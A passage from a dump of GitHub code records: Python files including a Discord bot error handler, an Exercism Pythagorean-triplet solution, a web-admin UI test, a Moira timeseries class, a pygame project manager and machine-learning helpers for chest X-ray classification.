\"\"\"\r\n await ctx.send(inp)\r\n\r\n @do_repeat.error\r\n async def do_repeat_handler(self, ctx, error):\r\n \"\"\"A local Error Handler for our command do_repeat.\r\n This will only listen for errors in do_repeat.\r\n The global on_command_error will still be invoked after.\r\n \"\"\"\r\n\r\n if isinstance(error, commands.MissingRequiredArgument):\r\n if error.param.name == 'inp':\r\n await ctx.send(\"You forgot to give me input to repeat!\")\r\n\r\n\r\ndef setup(bot):\r\n bot.add_cog(Errors(bot))\r\n","repo_name":"235baron/CatsyBot-Ultimatum","sub_path":"Cogs/cog_errorhandling.py","file_name":"cog_errorhandling.py","file_ext":"py","file_size_in_byte":7125,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"2223348446","text":"from math import sqrt, ceil, gcd\n\n\ndef triplets_in_range(start, end):\n for limit in range(4, end + 1, 4):\n for x_pos, y_pos, z_pos in primitive_triplets(limit):\n alpha = x_pos\n beta = y_pos\n gamma = z_pos\n\n while alpha < start:\n alpha = alpha + x_pos\n beta = beta + y_pos\n gamma = gamma + z_pos\n\n while gamma <= end:\n yield [alpha, beta, gamma]\n\n alpha = alpha + x_pos\n beta = beta + y_pos\n gamma = gamma + z_pos\n\n\ndef euclidian_coprimes(limit):\n mean = limit // 2\n for idx in range(1, int(ceil(sqrt(mean)))):\n if mean % idx == 0:\n member = mean // idx\n if (member - idx) % 2 == 1 and gcd(member, idx) == 1:\n yield member, idx\n\n\ndef primitive_triplets(limit):\n \"\"\"See Euclid's formula\n (https://en.wikipedia.org/wiki/Pythagorean_triple#Generating_a_triple)\n for more information\n \"\"\"\n for member_1, member_2 in euclidian_coprimes(limit):\n calc_1 = member_1 ** 2\n calc_2 = member_2 ** 2\n\n alpha = calc_1 - calc_2\n beta = 2 * member_1 * member_2\n gamma = calc_1 + calc_2\n\n if alpha > beta:\n alpha, beta = beta, alpha\n\n yield alpha, beta, gamma\n\n\ndef triplets_with_sum(number):\n return [\n triplet for triplet\n in triplets_in_range(1, number // 2)\n if sum(triplet) == number\n ]\n","repo_name":"exercism/python","sub_path":"exercises/practice/pythagorean-triplet/.meta/example.py","file_name":"example.py","file_ext":"py","file_size_in_byte":1500,"program_lang":"python","lang":"en","doc_type":"code","stars":1570,"dataset":"github-code","pt":"63"} +{"seq_id":"22502868545","text":"import random\nimport string\nimport time\n\nfrom test_framework.web_admin_core.pages.login.login_page import LoginPage\nfrom test_framework.web_admin_core.pages.markets.market_data_sources.main_page import \\\n MarketDataSourcesPage\nfrom test_framework.web_admin_core.pages.markets.market_data_sources.wizard import \\\n MarketDataSourcesWizard\nfrom test_framework.web_admin_core.pages.root.side_menu import SideMenu\nfrom test_framework.web_admin_core.utils.web_driver_container import WebDriverContainer\nfrom test_cases.web_admin.web_admin_test_cases.common_test_case import CommonTestCase\n\n\nclass QAP_T4012(CommonTestCase):\n def __init__(self, web_driver_container: WebDriverContainer, second_lvl_id, data_set=None, environment=None):\n super().__init__(web_driver_container, self.__class__.__name__, second_lvl_id, data_set=data_set,\n environment=environment)\n self.login = self.data_set.get_user(\"user_1\")\n self.password = self.data_set.get_password(\"password_1\")\n self.symbol = self.data_set.get_symbol_by_name(\"symbol_6\")\n self.user = self.data_set.get_user(\"user_12\")\n self.venue = self.data_set.get_venue_by_name(\"venue_1\")\n self.md_source = ''.join(random.sample((string.ascii_uppercase + string.digits) * 6, 6))\n self.md_source_edited = ''.join(random.sample((string.ascii_uppercase + string.digits) * 6, 6))\n\n def precondition(self):\n login_page = LoginPage(self.web_driver_container)\n login_page.login_to_web_admin(self.login, self.password)\n side_menu = SideMenu(self.web_driver_container)\n side_menu.open_market_data_source_page()\n main_page = MarketDataSourcesPage(self.web_driver_container)\n if not main_page.is_market_data_source_entity_displayed():\n main_page.click_on_new_button()\n wizard = MarketDataSourcesWizard(self.web_driver_container)\n wizard.set_symbol(self.symbol)\n wizard.set_user(self.user)\n wizard.set_venue(self.venue)\n wizard.set_md_source(self.md_source)\n wizard.click_on_save_changes()\n time.sleep(1)\n\n main_page.click_on_more_actions()\n main_page.click_on_edit_at_more_actions()\n\n def test_context(self):\n self.precondition()\n wizard = MarketDataSourcesWizard(self.web_driver_container)\n main_page = MarketDataSourcesPage(self.web_driver_container)\n headers = [\"Symbol\", \"User\", \"Venue\"]\n is_actual_fields_enabled = [wizard.is_symbol_field_enabled(), wizard.is_user_field_enabled(),\n wizard.is_venue_field_enabled()]\n expected_result = [False, False, False]\n self.verify_arrays_of_data_objects(\"Is fields enabled\", headers, expected_result, is_actual_fields_enabled)\n time.sleep(2)\n wizard.set_md_source(self.md_source_edited)\n time.sleep(2)\n wizard.click_on_save_changes()\n time.sleep(2)\n main_page.set_md_source_at_filter(self.md_source_edited)\n time.sleep(2)\n self.verify(\"After saved \", self.md_source_edited, main_page.get_md_source())\n","repo_name":"YevhenMoroz/th2-script-quod-demo","sub_path":"test_cases/web_admin/web_admin_test_cases/markets/QAP_T4012.py","file_name":"QAP_T4012.py","file_ext":"py","file_size_in_byte":3147,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"45218901568","text":"class TargetTimeSeries(dict):\n\n def __init__(self, *arg, **kwargs):\n super(TargetTimeSeries, self).__init__(*arg, **kwargs)\n self.other_targets_names = {}\n\n def get_expression_values(self, t1, timestamp):\n expression_values = {}\n for target_number in xrange(1, len(self) + 1):\n target_name = \"t%s\" % target_number\n tN = self[target_number][0] if target_number > 1 else t1\n value_index = (timestamp - tN.start) / tN.step\n tN_value = tN[value_index] if len(tN) > value_index else None\n expression_values[target_name] = tN_value\n if tN_value is None:\n break\n return expression_values\n\n def set_state_value(self, metric_state, expression_values, tN):\n if expression_values is None:\n if \"value\" in metric_state:\n del metric_state[\"value\"]\n else:\n metric_state[\"value\"] = expression_values[tN]\n\n def update_state(self, t1, check, expression_state, expression_values, timestamp):\n metric_state = check[\"metrics\"][t1.name]\n metric_state[\"state\"] = expression_state\n metric_state[\"timestamp\"] = timestamp\n self.set_state_value(metric_state, expression_values, \"t1\")\n\n for tN, tName in self.other_targets_names.iteritems():\n other_metric_state = check[\"metrics\"][tName]\n other_metric_state[\"state\"] = expression_state\n other_metric_state[\"timestamp\"] = timestamp\n self.set_state_value(other_metric_state, expression_values, tN)\n","repo_name":"moira-alert/worker","sub_path":"moira/checker/timeseries.py","file_name":"timeseries.py","file_ext":"py","file_size_in_byte":1576,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"63"} +{"seq_id":"27935479488","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Time : 2020/5/11 18:13\n# @Author : XXX\n# @title : 二叉树的镜像\n# @Site : \n# @File : 二叉树的镜像.py\n# @Software: PyCharm\n\n\nclass Solution:\n # 返回镜像树的根节点\n def Mirror(self, root):\n if root != None:\n root.left, root.right = root.right, root.left\n self.Mirror(root.left)\n self.Mirror(root.right)\n else:\n return None\n\n","repo_name":"KIM199511/-offer","sub_path":"code/二叉树的镜像.py","file_name":"二叉树的镜像.py","file_ext":"py","file_size_in_byte":457,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"23593507447","text":"# This is the Project manager it is made to create and manage your game project\r\n# Copyright (C) 2023 Marius Angermann\r\n#\r\n# This program is free software: you can redistribute it and/or modify\r\n# it under the terms of the GNU General Public License as published by\r\n# the Free Software Foundation, either version 3 of the License, or\r\n# (at your option) any later version.\r\n#\r\n# This program is distributed in the hope that it will be useful,\r\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\r\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\r\n# GNU General Public License for more details.\r\n#\r\n# You should have received a copy of the GNU General Public License\r\n# along with this program. If not, see .\r\n\r\n\r\nimport pygame\r\nimport sys\r\nimport os\r\nimport shutil\r\nimport subprocess\r\n\r\nfrom ui_modules.ui_input import Input\r\nfrom ui_modules.ui_button import Button\r\nfrom ui_modules.ui_askbox import AskBox\r\n\r\n\r\n\r\n\r\n\r\n\r\npygame.init()\r\n\r\nflag = pygame.NOFRAME\r\n\r\nicon = pygame.image.load(\"src/icon.png\")\r\n\r\npygame.display.set_icon(icon)\r\n\r\nscreen = pygame.display.set_mode((1000,700),flag)\r\n\r\nclock = pygame.time.Clock()\r\n\r\n\r\nrendered_projects = []\r\nprojects_initialized = []\r\nlast_pos = [0,0]\r\n\r\nclass rendered_project:\r\n\tdefault_font = pygame.font.SysFont(None,35)\r\n\tedit_font = pygame.font.SysFont(\"Agency FB\",20)\r\n\trender_costumes = [\r\n\t\tpygame.image.load(\"src/colored_shapes/project_render.png\"),\r\n\t\tpygame.image.load(\"src/colored_shapes/project_render_select.png\")\r\n\t]\r\n\tdelete_costumes = [\r\n\t\tpygame.image.load(\"src/icons/delete.png\"),\r\n\t\tpygame.image.load(\"src/icons/delete_hover.png\")\r\n\t]\r\n\tdef __init__(self,project_name=\"default-project\",last_opened_str=\"never\",last_position=[0,0]):\r\n\t\tself.name = project_name\r\n\t\tself.last_edit = last_opened_str\r\n\t\tself.title = self.default_font.render(self.name,True,(255,255,255))\r\n\t\tself.edit_label = self.edit_font.render(\"LAST EDITED: \" + self.last_edit,True,(255,255,255))\r\n\t\tself.selected = False\r\n\t\tself.delete_hovered = False\r\n\r\n\t\tif last_position == [0,0]:\r\n\t\t\tself.position = [10,200]\r\n\t\telse:\r\n\t\t\tself.position = [10,last_position[1]+200]\r\n\r\n\t\tself.del_pos = [self.position[0]+495,self.position[1]+55]\r\n\t\tself.open_button = Button(\"Open\",pygame.font.SysFont(None,30),200,60,(self.position[0]+285,self.position[1]+60),(11, 37, 59),(5, 16, 26),(35, 57, 77),12)\r\n\tdef render(self,display_surface):\r\n\t\t\r\n\t\tif self.selected == False:\r\n\t\t\tcostume = self.render_costumes[0]\r\n\t\telse:\r\n\t\t\tcostume = self.render_costumes[1]\r\n\r\n\t\tif self.delete_hovered == True:\r\n\t\t\tdelete_costume = self.delete_costumes[1]\r\n\t\telse:\r\n\t\t\tdelete_costume = self.delete_costumes[0]\r\n\r\n\t\tdelete_costume = pygame.transform.scale(delete_costume, (60,60))\r\n\r\n\t\ttest_hover = self.delete_costumes[0]\r\n\t\ttest_hover = pygame.transform.scale(test_hover, (60,60))\r\n\t\ttest_col = test_hover.get_rect()\r\n\t\ttest_col = test_col.move(self.del_pos)\r\n\r\n\t\tif test_col.collidepoint(pygame.mouse.get_pos()):\r\n\t\t\tself.delete_hovered = True\r\n\t\telse:\r\n\t\t\tself.delete_hovered = False\r\n\r\n\t\tif self.open_button.check_click():\r\n\t\t\topentemp = open(\"prcopen.info\", \"w\")\r\n\t\t\topentemp.writelines(self.name)\r\n\t\t\topentemp.close()\r\n\t\t\tscript_dir = os.path.dirname(os.path.realpath(__file__))\r\n\t\t\tsubprocess.Popen('cmd /c cd /d \"{}\" &'.format(script_dir), shell=True)\r\n\t\t\tsubprocess.Popen('python Editor.py', shell=True)\r\n\t\t\tpygame.quit()\r\n\t\t\tsys.exit()\r\n\r\n\t\tcostume_scaled = pygame.transform.scale(costume, (600,170))\r\n\t\tdisplay_surface.blit(costume_scaled, self.position)\r\n\t\tdisplay_surface.blit(self.title, (50,self.position[1]+30))\r\n\t\tdisplay_surface.blit(self.edit_label, (50,self.position[1]+80))\r\n\t\tself.open_button.draw(display_surface)\r\n\t\tdisplay_surface.blit(delete_costume, (self.del_pos[0],self.del_pos[1]))\r\n\tdef move_button(self, newvector=[0,0]):\r\n\t\tself.open_button.move(newvector)\r\n\r\n\r\n\r\n\r\n\r\ndef add_prc_to_render(last_pos):\r\n\tfor prcs in projects_initialized:\r\n\t\topenfile = open('projects/'+prcs+'/project.artix', 'r')\r\n\t\treadfile = openfile.readlines()\r\n\t\trendered_projects.append(rendered_project(prcs,str(readfile[0]),last_pos))\r\n\t\tlast_pos = [10,last_pos[1]+200]\r\n\t\topenfile.close()\r\n\r\nheadbar = pygame.image.load(\"src/colored_shapes/headbar.png\")\r\nheadbar_render = pygame.transform.scale(headbar, (1000,50))\r\n\r\ntitle_font = pygame.font.SysFont(None,30)\r\nwindow_title = title_font.render(\"Artix Project Manager\",True,(255,255,255))\r\n\r\ndef initialize_projects():\r\n\topened = open('registered_projects.info', 'r')\r\n\tread = opened.readlines()\r\n\tfor lines in read:\r\n\t\t# rstrip() to get rid of new line character\r\n\t\tline = lines.rstrip()\r\n\t\tif line != \"\":\r\n\t\t\tprojects_initialized.append(line)\r\n\tprint(projects_initialized)\r\n\topened.close()\r\n\r\n\r\ndef render_projects():\r\n\tfor elements in rendered_projects:\r\n\t\telements.render(screen)\r\n\t\r\n\t\r\ndef scroll_projects(status=\"down\"):\r\n\tcurrentindex = 0\r\n\tif status == \"down\":\r\n\t\tfor singleprcs in rendered_projects:\r\n\t\t\tsingleprcs.position = [singleprcs.position[0],singleprcs.position[1]-30]\r\n\t\t\tsingleprcs.del_pos = [singleprcs.del_pos[0],singleprcs.del_pos[1]-30]\r\n\t\t\tsingleprcs.move_button([0,-30])\r\n\telif status == \"up\":\r\n\t\tfor singleprcs in rendered_projects:\r\n\t\t\tsingleprcs.position = [singleprcs.position[0],singleprcs.position[1]+30]\r\n\t\t\tsingleprcs.del_pos = [singleprcs.del_pos[0],singleprcs.del_pos[1]+30]\r\n\t\t\tsingleprcs.move_button([0,30])\r\n\r\ndef del_prc(prc_name=\"\"):\r\n\twith open('registered_projects.info', 'r') as file:\r\n\t\tfile_contents = file.readlines()\r\n\t\tfile_contents = [line for line in file_contents if prc_name not in line]\r\n\twith open('registered_projects.info', 'w') as file:\r\n\t\tfile.writelines(file_contents)\r\n\tfolder_path = \"./projects/\" + prc_name\r\n\tshutil.rmtree(folder_path)\r\n\r\n\r\n\t\r\n\t\r\n\t\r\n\t\r\n\r\n\r\n\r\n\r\nexit_button_costumes = [\r\n\tpygame.image.load(\"src/icons/exit.png\"),\r\n\tpygame.image.load(\"src/icons/exit_hover.png\")\r\n]\r\n\r\nexit_button = exit_button_costumes[0]\r\nexit_button_render = pygame.transform.scale(exit_button, (40,40))\r\nexit_button_colshape = exit_button_render.get_rect()\r\nexit_button_colshape.x = 945\r\nexit_button_colshape.y = 5\r\n\r\n\r\nfont_1 = pygame.font.SysFont(\"OCR-A Extended\",40)\r\nrecent_projects_label = font_1.render(\"Recent Projects:\",True,(255,255,255))\r\nnew_project_button = Button(\"Create Project\",pygame.font.SysFont(None,30),200,40,(30,70),(92, 91, 91),(56, 56, 56),(143, 141, 141),12)\r\n\r\n\r\nrenderit = False\r\nfinal = \"\"\r\ncreate = False\r\nnew_project_box = AskBox(\"Enter Project Name\",\"New Project\",(1000,700))\r\n\r\nfade_rect = pygame.Rect(0,0,1000,200)\r\n\r\ninitialize_projects()\r\nadd_prc_to_render(last_pos)\r\n\r\nwhile True:\r\n\tif exit_button_colshape.collidepoint(pygame.mouse.get_pos()):\r\n\t\texit_button = exit_button_costumes[1]\r\n\t\texit_button_render = pygame.transform.scale(exit_button, (40,40))\r\n\telse:\r\n\t\texit_button = exit_button_costumes[0]\r\n\t\texit_button_render = pygame.transform.scale(exit_button, (40,40))\r\n\r\n\r\n\tfor event in pygame.event.get():\r\n\t\tnew_project_box.input_box.get_input(event)\r\n\r\n\t\tif event.type == pygame.QUIT:\r\n\t\t\tprint(\"\")\r\n\t\t\tprint(\"\")\r\n\t\t\tprint(\"press enter to quit >\")\r\n\t\t\tpygame.quit()\r\n\t\t\tsys.exit()\r\n\t\tif event.type == pygame.MOUSEBUTTONDOWN:\r\n\t\t\tif exit_button_colshape.collidepoint(event.pos):\r\n\t\t\t\tprint(\"\")\r\n\t\t\t\tprint(\"\")\r\n\t\t\t\tprint(\"\")\r\n\t\t\t\tprint(\"Press enter to quit>\")\r\n\t\t\t\tpygame.quit()\r\n\t\t\t\tsys.exit()\r\n\r\n\t\tif event.type == pygame.MOUSEBUTTONDOWN:\r\n\t\t\tif event.button == 1:\r\n\t\t\t\tfor renderedobjects in rendered_projects:\r\n\t\t\t\t\tif renderedobjects.delete_hovered == True:\r\n\t\t\t\t\t\tdel_prc(renderedobjects.name)\r\n\t\t\t\t\t\trendered_projects = []\r\n\t\t\t\t\t\tprojects_initialized = []\r\n\t\t\t\t\t\tinitialize_projects()\r\n\t\t\t\t\t\tprint(projects_initialized)\r\n\t\t\t\t\t\tadd_prc_to_render(last_pos)\r\n\t\t\tif event.button == 4: # Scroll up\r\n\t\t\t\tif rendered_projects[0].position[1] <= 230:\r\n\t\t\t\t\tscroll_projects(\"up\")\r\n\t\t\telif event.button == 5: # Scroll down\r\n\t\t\t\tif rendered_projects[len(rendered_projects)-1].position[1] >= 500:\r\n\t\t\t\t\tscroll_projects(\"down\")\r\n\r\n\t#logic\r\n\tif new_project_button.check_click() == True:\r\n\t\trenderit = True\r\n\r\n\r\n\t#rendering\r\n\tscreen.fill((46, 44, 44))\r\n\r\n\trender_projects()\r\n\tpygame.draw.rect(screen,(46, 44, 44),fade_rect)\r\n\tscreen.blit(headbar_render, (0,0))\r\n\tscreen.blit(window_title, (370,15))\r\n\tscreen.blit(exit_button_render, (945,5))\r\n\r\n\r\n\tscreen.blit(recent_projects_label,(35,135))\r\n\tnew_project_button.draw(screen)\r\n\t\r\n\r\n\tif renderit == True:\r\n\t\tvalue = new_project_box.get_active()\r\n\t\tif value == True:\r\n\t\t\trenderit = False\r\n\t\t\tcreate = True\r\n\t\telse:\r\n\t\t\trenderit = True\r\n\t\r\n\r\n\tif create == True:\r\n\t\tcreate = False\r\n\t\trenderit = False\r\n\t\tregistered_projects_temp = []\r\n\t\tfileopen = open('registered_projects.info','r')\r\n\t\tfileread = fileopen.readlines()\r\n\t\tfor lines in fileread:\r\n\t\t\tregistered_projects_temp.append(lines.rstrip(\"\\n\"))\r\n\t\tfileopen.close()\r\n\t\tfinal = new_project_box.get_value()\r\n\t\tif final != \"\" and final not in registered_projects_temp:\r\n\t\t\trenderit = True\r\n\t\t\tfileopen_privat = open('registered_projects.info','w')\r\n\t\t\tfileopen_privat.writelines(final+'\\n')\r\n\r\n\t\t\tcurrent_dir = os.getcwd()\r\n\t\t\tprojects_path = os.path.join(current_dir, \"projects\")\r\n\t\t\tnew_folder_path = os.path.join(projects_path, final)\r\n\t\t\tos.mkdir(new_folder_path)\r\n\t\t\tfile_path = os.path.join(new_folder_path, \"project.artix\")\r\n\t\t\twith open(file_path, 'w') as f:\r\n\t\t\t\tf.write('never')\r\n\r\n\t\t\tfile_path = os.path.join(new_folder_path, \"files.txt\")\r\n\t\t\twith open(file_path, 'w') as f:\r\n\t\t\t\tf.write('')\r\n\r\n\t\t\tfile_path = os.path.join(new_folder_path, \"scenes.txt\")\r\n\t\t\twith open(file_path, 'w') as f:\r\n\t\t\t\tf.write('DefaultScene')\r\n\r\n\t\t\tfile_path = os.path.join(new_folder_path, \"Files\")\r\n\t\t\tos.mkdir(file_path)\r\n\r\n\t\t\tfile_path = os.path.join(new_folder_path, \"Scenes\")\r\n\t\t\tos.mkdir(file_path)\r\n\t\t\tactualfile = os.path.join(file_path, \"DefaultScene.txt\")\r\n\t\t\twith open(actualfile, 'w') as f:\r\n\t\t\t\tf.write('')\r\n\r\n\t\t\tfolder = os.path.join(file_path, \"DefaultScene\")\r\n\t\t\tos.mkdir(folder)\r\n\t\t\tactualfile = os.path.join(folder, \"Camera2D.config\")\r\n\t\t\tcameraconfig = [\"#TRANSFORM\",\"0\",\"0\",\"#BGCOLOR\",\"#ffffff\"]\r\n\t\t\twith open(actualfile, 'w') as f:\r\n\t\t\t\tfor strings in cameraconfig:\r\n\t\t\t\t\tf.write(strings+\"\\n\")\r\n\r\n\t\t\tloe = len(registered_projects_temp)\r\n\t\t\tcurrentindex = 0\r\n\t\t\tfor elements in registered_projects_temp:\r\n\t\t\t\tif currentindex == (loe-1):\r\n\t\t\t\t\tfileopen_privat.writelines(elements+'\\n')\r\n\t\t\t\telse:\r\n\t\t\t\t\tfileopen_privat.writelines(elements)\r\n\t\t\t\tcurrentindex += 1\r\n\t\t\tfileopen_privat.close()\r\n\t\t\tfinal = \"\"\r\n\t\t\trendered_projects = []\r\n\t\t\tprojects_initialized = []\r\n\t\t\tinitialize_projects()\r\n\t\t\tprint(projects_initialized)\r\n\t\t\tadd_prc_to_render(last_pos)\r\n\t\r\n\tif renderit == True:\r\n\t\tnew_project_box.render(screen,(1000,700))\r\n\tpygame.display.update()\r\n\tclock.tick(60)\r\n\r\n\tif pygame.display.get_active() == False:\r\n\t\tpygame.quit()\r\n\t\tsys.exit()\r\n\r\nprint(\"\")","repo_name":"MariusAngermann08/Artix-Engine","sub_path":"project_manager.py","file_name":"project_manager.py","file_ext":"py","file_size_in_byte":10755,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"63"} +{"seq_id":"35014306031","text":"\"\"\"\nThis file contains definitions of various helper functions and utilities used during our experimentation.\n\nAuthor: Dominik Chodounský\nInstitution: Faculty of Information Technology, Czech Technical University in Prague\nLast edit: 2021-05-12\n\"\"\"\n\n\nimport cv2\nimport tensorflow as tf\nfrom tensorflow.keras.preprocessing.image import ImageDataGenerator\nimport tensorflow.keras.backend as K\nfrom sklearn.metrics import confusion_matrix, roc_auc_score, roc_curve\nimport random\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport numpy as np\nimport os\nimport shutil\n\n\ndef show_sample_grid(path, grid_size=6):\n \"\"\"\n Prints a grid of an equal representation of randomly selected images from the 'negative' class and the 'positive' class.\n \n Parameters\n ----------\n path : str\n Path to folder contaning the data. This folder should contain one subfolder per class (negative and positive) with the image data within them.\n grid_size : int\n Size of the side of the grid, the resulting number of images displayed will be grid_size * grid_size. Default value: 6.\n \"\"\"\n \n if grid_size % 2 != 0:\n raise ValueError(f'The grid size must be divisible by 2, so that both classes can be represented equally')\n\n negative = random.sample(os.listdir(os.path.join(path, 'negative')), int(grid_size**2 / 2))\n positive = random.sample(os.listdir(os.path.join(path, 'positive')), int(grid_size**2 / 2))\n\n negative_imgs = [cv2.imread(os.path.join(path, 'negative', i)) for i in negative]\n positive_imgs = [cv2.imread(os.path.join(path, 'positive', i)) for i in positive]\n\n plt.figure(figsize=(12,12))\n i, j = 0, 0\n for cnt in range(grid_size**2):\n ax = plt.subplot(grid_size, grid_size, cnt + 1)\n plt.xticks([])\n plt.yticks([])\n plt.grid(False)\n if cnt % 2 == 0:\n plt.imshow(negative_imgs[i], cmap='bone')\n if grid_size < 13:\n ax.set_xlabel('negative', labelpad=0.1)\n i += 1\n else:\n plt.imshow(positive_imgs[j], cmap='bone')\n if grid_size < 13:\n ax.set_xlabel('positive',labelpad=0.1)\n j += 1\n plt.show()\n #plt.savefig(os.path.abspath(os.path.join('/content/drive/MyDrive/ColabNotebooks/BI-BAP', 'diagrams/covidx8_sample.pdf')), bbox_inches='tight', format='pdf')\n \n\ndef plot_eval(y_true, y_pred_prob, y_pred):\n \"\"\"\n Prints a confusion matrix and an ROC curve with a calculated AUC metric for given classification results.\n \n Parameters\n ----------\n y_true : NumPy.ndarray\n Ground truth labels of the evaluated samples.\n y_pred_prob : NumPy.ndarray\n Predicted probabilities of the evaluated samples belonging to the positive class.\n y_pred : NumPy.ndarray\n Predicted class of the evaluated samples.\n \"\"\"\n \n # set font style to match with written part of the thesis\n plt.rcParams['font.family'] = 'serif'\n plt.rcParams['font.serif'] = ['Times New Roman'] + plt.rcParams['font.serif']\n\n # construct a confusion matrix\n cm = confusion_matrix(y_true, y_pred)\n ax = sns.heatmap(cm, annot=True, cmap='Blues', fmt='d', xticklabels=['negative', 'positive'], yticklabels=['negative', 'positive'], vmin=0, vmax=np.count_nonzero(y_true == 0), annot_kws={'size': 15})\n\n ax.set_yticklabels(labels=ax.get_yticklabels(), va='center')\n plt.tick_params(axis='both', which='major', labelsize=13)\n plt.xlabel('Predicted labels', fontsize = 14, labelpad=12)\n plt.ylabel('True labels', fontsize = 14, labelpad=12)\n cbar = ax.collections[0].colorbar\n cbar.ax.tick_params(labelsize=12)\n\n plt.show()\n\n # calculate ROC rurve and its AUC metric\n fpr_keras, tpr_keras, thresholds_keras = roc_curve(y_true, y_pred_prob)\n auc = roc_auc_score(y_true, y_pred_prob)\n\n plt.figure(1)\n plt.plot([0, 1], [0, 1], 'k--', linewidth=2, color='darkblue')\n plt.plot(fpr_keras, tpr_keras, label='ROC (AUC = {:.3f})'.format(auc), linewidth=2, color='darkorange')\n\n plt.tick_params(axis='both', which='major', labelsize=13)\n plt.xlabel('False positive rate', fontsize=14, labelpad=12)\n plt.ylabel('True positive rate', fontsize=14, labelpad=8)\n plt.title('Receiver Operating Characteristic Curve', fontsize=15)\n plt.legend(loc='lower right', fontsize=15)\n plt.xlim(-0.01,1)\n plt.ylim(0,1.01)\n\n plt.show()\n\n \n \ndef get_generators(datagen, train_dir, test_dir, img_size=224, batch_size=32, channel_cnt=3, shuffle=True, rand_seed=111):\n \"\"\"\n Creates data sources from a given image data generator, which are then used in training and evaluating a model.\n \n Parameters\n ----------\n datagen : TensorFlow.keras.preprocessing.image.ImageDataGenerator\n Image data generator based on which the sources will be created.\n train_dir : str\n Path to folder containing training images.\n test_dir : str\n Path to folder containing testing images.\n img_size : int\n Target size of the images. Default value: 224.\n batch_size : int\n Batch size, which will be yielded by the generators in each call. Default value: 32.\n channel_cnt : int\n Number of channels in the input images. The count determines whether rgb or grayscale mode will be used. Default value: 3.\n shuffle : bool\n Wheteher to shuffle the order of the images when generating them. Default value: True.\n rand_seed : int\n Random seed for the shuffling. Default value: 111.\n \n Returns\n -------\n train_gen, valid_gen, test_gen : TensorFlow.keras.preprocessing.image.DirectoryIterator\n Iterators, which yield tuples of (x, y) where x is a NumPy array containing a batch of images and y is a NumPy array of their corresponding labels.\n \"\"\"\n if channel_cnt == 3:\n mode = 'rgb'\n elif channel_cnt == 1:\n mode = 'grayscale'\n else:\n raise ValueError(f'The target number of channels in the images must be either 1 (grayscale) or 3 (rgb)')\n \n train_gen = datagen.flow_from_directory(\n directory=train_dir,\n target_size=(img_size, img_size),\n batch_size=batch_size,\n class_mode='binary',\n subset='training',\n color_mode=mode,\n shuffle=shuffle,\n seed=rand_seed\n )\n\n valid_gen = datagen.flow_from_directory(\n directory=train_dir,\n target_size=(img_size, img_size),\n batch_size=batch_size,\n class_mode='binary',\n subset='validation',\n color_mode=mode,\n shuffle=shuffle,\n seed=rand_seed\n )\n \n # copy original datagen's preprocessing function, but discard augmentation settings\n datagen_test = ImageDataGenerator(preprocessing_function=datagen.preprocessing_function)\n test_gen = datagen_test.flow_from_directory(\n directory=test_dir,\n target_size=(img_size, img_size),\n batch_size=batch_size,\n class_mode='binary',\n color_mode=mode,\n shuffle=False,\n seed=rand_seed\n )\n \n return train_gen, valid_gen, test_gen\n\n\ndef get_class_weights(train_dir, class_cnt=2):\n \"\"\"\n Calculates weights for the two classes based on their representation in the training data.\n The more observed class will be assigned a proportionally lower weight.\n \n Parameters\n ----------\n train_dir : str\n Path to the folder with training data. This folder should include two subfolders, one for each class (negative, positive).\n \n Returns\n -------\n class_weights : dict\n Dictionary where there is a key for both of the classes and the key's value is the weight for the given class in training.\n Negative class has key '0' and positive class key '1'.\n \"\"\"\n \n negative_cnt = len(os.listdir(os.path.join(train_dir, 'negative')))\n positive_cnt = len(os.listdir(os.path.join(train_dir, 'positive')))\n total = negative_cnt + positive_cnt\n\n class_weights = {\n 0: total / (negative_cnt * class_cnt),\n 1: total / (positive_cnt * class_cnt)\n }\n \n return class_weights\n \n \ndef create_dataframe(train_dir):\n \"\"\"\n Collects all files in a dataset folder into a DataFrame and labels them according to which subfolder (class) they belong to.\n \n Parameters\n ----------\n train_dir : str\n Path to folder which is to be turned into a DataFrame.\n \n Returns\n -------\n train_df : pandas.DataFrame\n Shuffled dataframe with all the files of given directory. Files are identified by the column 'path' and their label by the column 'label'.\n \"\"\"\n train_df = pd.DataFrame(columns=['path', 'label'])\n labels = ['negative', 'positive']\n for l in labels:\n paths = os.listdir(os.path.join(train_dir, l))\n train_df = train_df.append([pd.Series({'path': os.path.join(l, i), 'label': l}) for i in paths], ignore_index=True)\n return train_df.sample(frac=1)\n \n\ndef get_crossval_generators(datagen, train_dir, train_data, valid_data, img_size=224, batch_size=32, channel_cnt=3, shuffle=True, rand_seed=111):\n \"\"\"\n Creates data sources from a given image data generator, which are then used in training and validating a model. These sources use data indexed by two DataFrames\n and are meant to be applied in the K-fold cross-validation pipeline.\n \n Parameters\n ----------\n datagen : TensorFlow.keras.preprocessing.image.ImageDataGenerator\n Image data generator based on which the sources will be created.\n train_dir : str\n Path to folder containing training images.\n train_data : pandas.DataFrame\n Dataframe containing paths and labels of training data.\n valid_data : pandas.DataFrame\n Dataframe containing paths and labels of validation data.\n img_size : int\n Target size of the images. Default value: 224.\n batch_size : int\n Batch size, which will be yielded by the generators in each call. Default value: 32.\n channel_cnt : int\n Number of channels in the input images. The count determines whether rgb or grayscale mode will be used. Default value: 3.\n shuffle : bool\n Wheteher to shuffle the order of the images when generating them. Default value: True.\n rand_seed : int\n Random seed for the shuffling. Default value: 111.\n \n Returns\n -------\n train_gen, valid_gen : TensorFlow.keras.preprocessing.image.DirectoryIterator\n Iterators, which yield tuples of (x, y) where x is a NumPy array containing a batch of images and y is a NumPy array of their corresponding labels.\n \"\"\"\n if channel_cnt == 3:\n mode = 'rgb'\n elif channel_cnt == 1:\n mode = 'grayscale'\n else:\n raise ValueError(f'The target number of channels in the images must be either 1 (grayscale) or 3 (rgb)')\n \n train_gen = datagen.flow_from_dataframe(\n dataframe=train_data,\n directory=train_dir,\n x_col='path',\n y_col='label',\n target_size=(img_size, 